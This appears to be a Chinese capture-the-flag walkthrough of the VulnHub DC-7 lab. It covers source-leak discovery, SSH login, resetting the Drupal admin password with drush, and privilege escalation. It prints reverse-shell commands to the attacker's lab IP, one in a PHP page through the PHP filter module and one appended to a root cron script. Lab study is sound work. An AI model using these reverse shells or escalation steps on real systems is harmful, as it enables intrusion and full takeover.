vulnhub靶场【DC系列】之7

前言

靶机:DC-7,IP地址为192.168.10.13

攻击:kali,IP地址为192.168.10.2

都采用VMWare,网卡为桥接模式

对于文章中涉及到的靶场以及工具,我放置在网盘中,链接:https://pan.quark.cn/s/203d4b01f3d7

主机发现

使用arp-scan -l或者netdiscover -r 192.168.10.1/24

因为是靶机,所以在同一局域网中,这里使用这两个工具是因为在同一局域网中的扫描速度很快

当然,如果想要模拟真实渗透,可以使用nmap等扫描工具

主机发现

使用arp-scan -l或者netdiscover -r 192.168.10.1/24

因为是靶机,所以在同一局域网中,这里使用这两个工具是因为在同一局域网中的扫描速度很快

当然,如果想要模拟真实渗透,建议使用nmap等扫描工具

网站信息探测

访问80端口默认界面,发现这个CMS之前见过,是drupal,不过这里给出的话有点东西,下面翻译看看

把这段话翻译,然后以图片来看,应该更直观

使用whatweb进一步确定drupal是否正确

whatweb http://192.168.10.13

这里看到是drupal 8在之前的DC-1靶场中是drupal 7版本,然后通过msf进行的攻击

但是这里不行,按照提示,虽然进行爆破没有什么用,但是还是进行一下目录扫描,不过这次感觉东西是真多,之前并未出现这种情况,感觉是作者为了再次的提醒一样,这里放一张图吧,是放在那里进行好久的目录爆破

漏洞寻找

再使用burp等工具尝试对登录进行一个爆破,发现若长时间的爆破,会使得其进行了限制,注意,这里是对账号进行的限制

尝试获取js代码,测试有无这方面的,但是发现基本上都是调用外部js,无用处

在发现的搜索处进行各种注入测试,发现也是不行,使用sqlmap测试,发现也是不行

抓取每个请求的数据包,发现也是无内容,那么尝试搜搜,看能否有源码之类的泄露,尝试直接搜索drupal 8,但是想到这里都是纯净的原始状态,除非进行代码审计,去把其中的代码进行分析,然后找出漏洞

啧,再找找。在网站的底部,发现一串字符,想来,平常这种位置,一般也是邮箱偏多,这种形式,还真是少见的,尝试对这个进行搜索@DC7USER

源码泄露

因为靶机属于国外的作者所制作,所以,这里建议采用google进行搜索,可以明确的看到,在github有项目

查看该项目,可以看到,readme文件,给出了方向,说明找对了方向

在众多代码中,我们要么就是进行代码审计,要么就是寻找配置文件

查看config.php文件,发现关键信息,项目地址https://github.com/Dc7User/staffdb/blob/master/config.php

连接数据库的用户名dc7user和密码MdR3xOgB7#dW

那么在之前端口扫描的时候,并未发现数据库相关的服务端口是开放的,那么就猜测这个用户名和密码,可能是多用的,尝试以这一组身份信息,登录网站

不过这里还是登录不了网站,啧,既然是登录,就不应该如此,说明这一组不是网站的

还有ssh服务,尝试进行登录,登录成功

提权点寻找

查看当前目录下的文件mbox,发现好多信息

到备份数据库数据的目录下,查看,发现数据大小为0

那么查看其中的备份脚本,看以所属者和所属组,以及脚本内容,好家伙,是gpg加密,但是文件无内容,并且尝试解密,也是只有gpg: decrypt_message failed: Unknown system error

并且这个脚本所属组是www-data,加入脚本可以修改或者使用临时环境变量,也都无法提权至root

错误的提权

使用find寻找具有SUID权限文件,发现一个文件,是不是很眼熟,这里在前面的DC-4靶机一样

find / -perm -4000 -print 2>/dev/null

这里与前面的mbox文件中的信息提到的一样,还是再确定一下版本

/usr/sbin/exim4 --version

kali中使用searchsploit搜索对应的版本漏洞,并复制到当前目录下

如果忘了用法,这里再查看这个脚本即可,脚本文件名加上后面两种即可

然后把这个脚本上传到靶机,可以使用python配合wget或者直接使用scp,因为这里是以ssh连接

scp ./46996.sh dc7user@192.168.10.13:/tmp

这里还可以看到,该脚本具有执行权限,直接执行,但是发现不行

正确的提权方向

那么只能再次回到备份文件脚本的问题,也就是/opt/scripts/backups.sh

因为当前用户dc7user还不属于www-data组,也就是说,两个办法,要不切换到www-data,要不就是root

对于现在的情况来说,只能切换到www-data

这里我在/var/www/html中找到配置文件settings.php,发现其中连接数据库的账号与密码

但是连接数据库后,发现这里面只是记录网站访问等一些信息,并没有用户信息保存在这里

回头查看/opt/scripts/backups.sh脚本,发现这里除了gpg无用,还有一个命令没接触过drush

使用AI搜索一下

Drush 是 Drupal 的配套工具

  • Drupal 是一个功能强大的内容管理系统(CMS),用于构建和管理网站。它提供了丰富的网站构建模块、主题系统、用户管理、内容发布等功能。然而,在实际的网站管理和开发过程中,仅仅通过 Drupal 的图形界面来操作可能会比较繁琐。
  • 当 Drush 是通过 Composer 在项目本地安装时,它通常位于项目的vendor/bin/目录下。例如,如果你的 Drupal 项目位于/var/www/drupal_project/,并且通过 Composer 安装了 Drush,那么 Drush 可执行文件可能位于/var/www/drupal_project/vendor/bin/drush

这里列出drush的增、删、改、查的操作

#增操作
drush user-create [new_user_name] --mail=[user_email] --password=[user_password]
#其中[new_user_name]是新用户的用户名,--mail选项用于指定用户的电子邮件地址,--password选项用于指定用户的密码。#删操作
drush user-cancel [user_name]#改操作
drush user-password [user_name] -password=[new_password]
#其中[user_name]是要更改密码的用户名,[new_password]是新密码。#查操作
drush user-list
#列出用户情况

我这里因为执行命令时,出现错误,把admin删除了,所以这里重装靶机,唉😔,不过IP地址没有变

这里测试后,发现只有改和删的操作是可以的

drush user-password admin --password=123

登录网站,为什么,因为根据备份文件,要获取www-data的身份

经过测试,发现并没有可利用点,不过这里可以安装模块,因为网站当前身份是admin

extend中,尝试安装一些模块,当然这里可以访问其官方网站,然后通过这里去下载

图中,蓝色超链接的标志,这里提供官网模块地址,访问后,可以直接搜索寻找

https://www.drupal.org/project/project_module

但是这里我原本打算,把模块文件下载到kali中,然后修改其中的内容,但是发现本地无法上传成功,不管有无修改,这个方式都不行

获取www-data的反弹1shell

只能采取第一种方式,链接下载,这里的地址,在输入框下面已经给出提示了

For example: https://ftp.drupal.org/files/projects/name.tar.gz

既然无法修改,那么就安装php模块,因为搜索发现在8版本中,取消了这个,所以需要自己主动安装。

可以先访问下面的链接地址,来确定当前版本可支持使用的php

https://www.drupal.org/project/php/releases/8.x-1.0

然后构造链接,从URL下载

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

然后在扩展列表界面,下滑,找到php filter,把这个勾选上,然后再下滑到最后,点击install

成功启动

打开一个文章,然后对其进行编辑,可以发现,可以更改其为php代码的形式

那么新建一个文章,然后使用php格式,然后进行保存

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.2/9999 0>&1'");
//system($_REQUEST['cmd']);		//用于测试使用
?>

当然,在执行上面的反弹shell时,需要先在kali中开启监听

nc -lvvp 9999

获取到www-databash

提权至root

然后在该脚本的末尾加入反弹shell代码,不过需要在kali另起终端,监听8888端口

echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.2/8888 0>&1'" >> backups.sh

如果,这条命令不行,就可以在https://forum.ywhack.com/shell.php测试合适的,添加就是了

查看flag

这里补充说一下,对于脚本backups.sh,修改后,不要执行,一旦执行,是以当前用户的身份,也就是www-data执行的,是无法提权的。

这里我忘了放图了,在前面,我是借助工具pspy64获取到backups.sh会以root身份执行,只是时间间隔有点大,所以当时没有截图

该工具项目地址https://github.com/DominicBreuker/pspy/releases

总结

该靶场考察以下几点:

  1. 对于信息收集时,源码泄露能否会寻找,这里是通过一个作者名搜索到gihub的项目
  2. 对于提权时,发现的东西都要去试一试,这里先测试exim4不行后,再下手脚本文件
  3. 对于脚本文件的所属者和所属组要搞清楚,这里dc7user不属于www-data组,所以还需要获取www-data用户的反弹shell,那么就需要从网站下手
  4. 对于drushdrupal是配合使用的,所以简单了解drush的增删改查即可
  5. drupal 8下载扩展模块,可以自己选择,不过出于安全,版本8没有php,所以可以安装php
  6. 通过php中的函数,可执行命令,来获取www-datashell
  7. 通过pspy64观察有root执行的定时任务,并且是脚本backups.sh,用户www-data可修改。获取到www-databash后,就可以修改文件,添加反弹shell的命令,等待root去执行这个定时任务,触发脚本中的反弹shell代码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/504028.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

内网基础-防火墙-隧道技术

内网对抗-网络通讯篇&防火墙组策略&入站和出站规则&单层双层&C2正反向上线 关闭第一个防火墙&#xff1a; 第一个上线就走反向或者正向 第二个上线走反向&#xff08;第二个防火墙阻止入站&#xff09; 关闭第二个防火墙&#xff1a; 第一个上线就走反向&a…

BGP的local_preference本地优先级属性

一、BGP的local preference属性简介 1、local preference公认任意属性 当一条BGP路由器中存在多条去往同一目标网络的BGP路由时&#xff0c;BGP协议会对这些BGP路由属性进行比较&#xff0c;从而筛选出最佳到达目标网络的通达路径。本地优先属性&#xff0c;只在IBGP对等体之间…

从零手写线性回归模型:PyTorch 实现深度学习入门教程

系列文章目录 01-PyTorch新手必看&#xff1a;张量是什么&#xff1f;5 分钟教你快速创建张量&#xff01; 02-张量运算真简单&#xff01;PyTorch 数值计算操作完全指南 03-Numpy 还是 PyTorch&#xff1f;张量与 Numpy 的神奇转换技巧 04-揭秘数据处理神器&#xff1a;PyTor…

如何让用户在网页中填写PDF表格?

在网页中让用户直接填写PDF表格&#xff0c;可以大大简化填写、打印、扫描和提交表单的流程。通过使用复选框、按钮和列表等交互元素&#xff0c;PDF表格不仅让填写过程更高效&#xff0c;还能方便地在电脑或移动设备上访问和提交数据。 以下是在浏览器中显示可填写PDF表单的四…

【和春笋一起学C++】文本输入与读取(二)

目录 使用cin.eof()或cin.fail()检测EOF 使用cin.get(ch)的返回结果检测EOF 使用cin.get()的返回结果检测EOF 上篇文章《文本输入与读取》学习了遇到某个字符时停止读取&#xff0c;那如果要读取键盘输入的所有字符该怎么做呢。答案是检测文件尾&#xff08;EOF&#xff09;…

Ungoogled Chromium127 编译指南 MacOS篇(八)- 开始编译

1. 引言 完成了所有依赖包的安装后&#xff0c;我们终于来到了最关键的编译阶段。在开始编译之前&#xff0c;有一些重要的配置信息需要了解。本文将指导您完成整个编译过程。 2. 签名相关说明 虽然在我们的测试编译中不需要进行签名操作&#xff0c;但了解官方的签名要求仍…

Jenkins内修改allure报告名称

背景&#xff1a; 最近使用Jenkins搭建自动化测试环境时&#xff0c;使用Jenkins的allure插件生成的报告&#xff0c;一直显示默认ALLURE REPORT&#xff0c;想自定义成与项目关联的名称&#xff0c;如图所示&#xff0c;很明显自定义名称显得高大上些 本地修改方法&am…

关于物联网的基础知识(二)——物联网体系结构分层

成长路上不孤单&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a; 【14后&#x1f60a;///计算机爱好者&#x1f60a;///持续分享所学&#x1f60a;///如有需要欢迎收藏转发///&#x1f60a;】 今日分享关于物联网的基础知识&#xff08;二&a…

应急响应——Windows / Linux 排查笔记

一、基本思路流程 收集信息&#xff1a;收集客户信息和中毒主机信息&#xff0c;包括样本判断类型&#xff1a;判断是否是安全事件&#xff0c;何种安全事件&#xff0c;勒索、挖矿、断网、DoS 等等抑制范围&#xff1a;隔离使受害⾯不继续扩⼤深入分析&#xff1a;日志分析、…

Git撤销指定commit并更新远端仓库

Git撤销指定commit并更新远端仓库 一、撤销指定commit 1.首先执行git log 命令&#xff0c;查看git历史提交以及commit信息&#xff1a; 由于需要脱敏&#xff0c;所以截图可能看得马赛克比较多&#xff0c;需要关注的就是上面的commit后跟的id&#xff0c;以及HEAD当前指定…

C 语言奇幻之旅 - 第16篇:C 语言项目实战

目录 引言1. 项目规划1.1 需求分析与设计1.1.1 项目目标1.1.2 功能需求1.1.3 技术实现方案 2. 代码实现2.1 模块化编程2.1.1 学生信息模块2.1.2 成绩管理模块 2.2 调试与测试2.2.1 调试2.2.2 测试2.2.4 测试结果 3. 项目总结3.1 代码优化与重构3.1.1 代码优化3.1.2 代码重构 3.…

2025最新解决方案:新买的mac鼠标和这个触控板反向

solution1 &#xff1a;1.打开设置&#xff0c;搜索 触控 点击 自然滚动 ----->解决的是 触控板 但是还是解决不了鼠标反向的问题 solution1 ultra&#xff1a; 下载一个免费 且纯净的 软件 Scroll Reverser for macOS 这是给出的链接&#xff0c;非常简单&#xff0c;…

黄仁勋CES 2025演讲重点内容

黄仁勋CES 2025演讲重点内容 硬件产品发布 GeForce RTX 50系列GPU&#xff1a; 架构与性能提升&#xff1a;正式发布的新一代GeForce RTX 50系列GPU采用英伟达旗舰的Blackwell架构&#xff0c;这是自25年前引入可编程着色技术以来计算机图形领域最重大的创新。该系列显卡在图形…

机器学习免费使用的数据集及网站链接

机器学习领域存在许多可以免费使用的数据集&#xff0c;这些数据集来自于学习、研究、比赛等目的。 一、综合性数据集平台 1.Kaggle 网址&#xff1a;Kaggle 数据集https://www.kaggle.com/datasets Kaggle是一个数据科学竞赛和社区平台&#xff0c;提供了大量的数据集供用…

nodejs的降级

不使用nvm&#xff0c;直接使用zip包和手动配置环境变量。 下载相关的zip版本的&#xff0c; 解压相关文件&#xff0c;配置系统环境变量PATH&#xff0c;安装的其他的都不用修改 修改系统变量中的path值&#xff0c;重启下电脑 注意要重启idea&#xff0c;如果还是无效&…

ASP.NET Core 实现微服务 - Elastic APM

这次要给大家介绍的是Elastic APM &#xff0c;一款应用程序性能监控组件。APM 监控围绕对应用、服务、容器的健康监控&#xff0c;对接口的调用链、性能进行监控。在我们实施微服务后&#xff0c;由于复杂的业务逻辑&#xff0c;服务之间的调用会像蜘蛛网一样复杂。有了调用链…

自定义EasyCode模板生成CRUD

文章目录 1.生成步骤1.定义全局逻辑删除字段名称以及删除值和未删除值2.简单三层架构模板1.概览2.Req.java3.Vo.java4.Po.java5.Mapper.java6.Mapper.xml7.Service.java8.ServiceImpl.java9.Controller.java 3.通用配置生成模板1.概览2.PageInfo.java3.PageResult.java4.SunPag…

IOS开发如何从入门进阶到高级

针对iOS开发的学习&#xff0c;不同阶段应采取不同的学习方式&#xff0c;以实现高效提升.本文将iOS开发的学习分为入门、实战、进阶三个阶段&#xff0c;下面分别详细介绍. 一、学习社区 iOS开源中国社区 这个社区专注于iOS开发的开源项目分享与协作&#xff0c;汇集了大量开…

洛谷P1617————数字转英文

题目如下 思路&#xff1a;将1~9的英文和20~90的英文用字符串数组存储&#xff0c;把下标看作对应的数字进行输出&#xff0c;遇到0或连续多个0就输出“and”&#xff0c;定义l用来看枚举到哪一位了&#xff0c;如果是单独输入一个“0”&#xff0c;则直接输出zero然后结束。否…

Kubernetes集群架构

Kubernetes集群架构 Kubernetes 集群架构控制平面组件kube-apiserveretcdkube-schedulerkube-controller-managercloud-controller-manager 节点组件kubeletkebe-proxy&#xff08;可选&#xff09;容器运行时 插件DNSWeb UI&#xff08;Dashboard&#xff09;容器资源监控集群…